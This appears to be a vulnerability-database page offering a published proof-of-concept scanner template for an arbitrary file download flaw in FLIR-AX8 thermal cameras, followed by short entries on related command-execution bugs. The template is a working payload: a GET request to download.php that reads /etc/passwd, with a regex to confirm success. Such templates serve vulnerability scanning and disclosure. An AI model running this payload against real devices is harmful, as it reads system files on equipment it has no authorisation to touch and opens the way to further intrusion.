flix-ax8-download-read-file: FLIR-AX8 download.php 任意文件下载

漏洞描述

PoC代码[已公开]

id: flix-ax8-download-read-file

info:
  name: FLIR-AX8 download.php 任意文件下载
  author: zan8in
  severity: high
  description: |
    FLIR-AX8 download.php文件过滤不全 存在任意文件下载漏洞
    app="FLIR-FLIR-AX8"
  reference:
    - http://wiki.peiqi.tech/wiki/iot/%E8%8F%B2%E5%8A%9B%E5%B0%94/FLIR-AX8%20download.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8B%E8%BD%BD.html

rules:
  r0:
    request:
      method: GET
      path: /download.php?file=/etc/passwd
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()

相关漏洞推荐

• flir-ax8-res-php-rce: FLIR-AX8 res.php 后台命令执行漏洞 POC

  2025-09-01 | FLIR-AX8
  FLIR AX8将红外热像仪、可见光相机集成入一种结构小巧、经济实惠的架构中，为关键机电设备的无间断状态监控提供连续的温度监控报警。FLIR AX8系统存在远程代码执行漏洞，攻击者通过漏洞可以获取服务...

• FLIR-AX8热成像仪palette.php存在远程命令执行漏洞 POC

  2024-10-08 | FLIR-AX8热成像仪
  美国菲力尔公司（TeledyneFLIR）专注于设计、开发、生产、营销和推广用于增强态势感知力的专业技术。该公司的FLIR-AX8热成像仪palette.php存在远程命令执行漏洞，允许攻击者在目标服...

• FLIR-AX8 res.php 任意命令执行(CVE-2022-37061) 无POC

  2022-09-09 | FLIR-AX8
  FLIR AX8 版本 1.46.16 及以下未经身份验证的远程操作系统命令注入漏洞。res.php 页面中的 id 参数可以通过命令拼接，以 root用户身份注入和执行任意 shell 命令，成功的...

• flix-ax8-command-injection: FLIR-AX8 res.php POC

  2025-09-01 | flix-ax8
  FLIR-AX8 res.php 存在命令注入漏洞 app="FLIR-FLIR-AX8"

• SourceCodester Pet Grooming Management Software SQL注入漏洞 无POC

  2025-09-22 00:22:31 | SourceCodester Pet Grooming Management Software
  SourceCodester Pet Grooming Management Software是SourceCodester开源的一个宠物美容管理系统。 SourceCodester Pet Groo...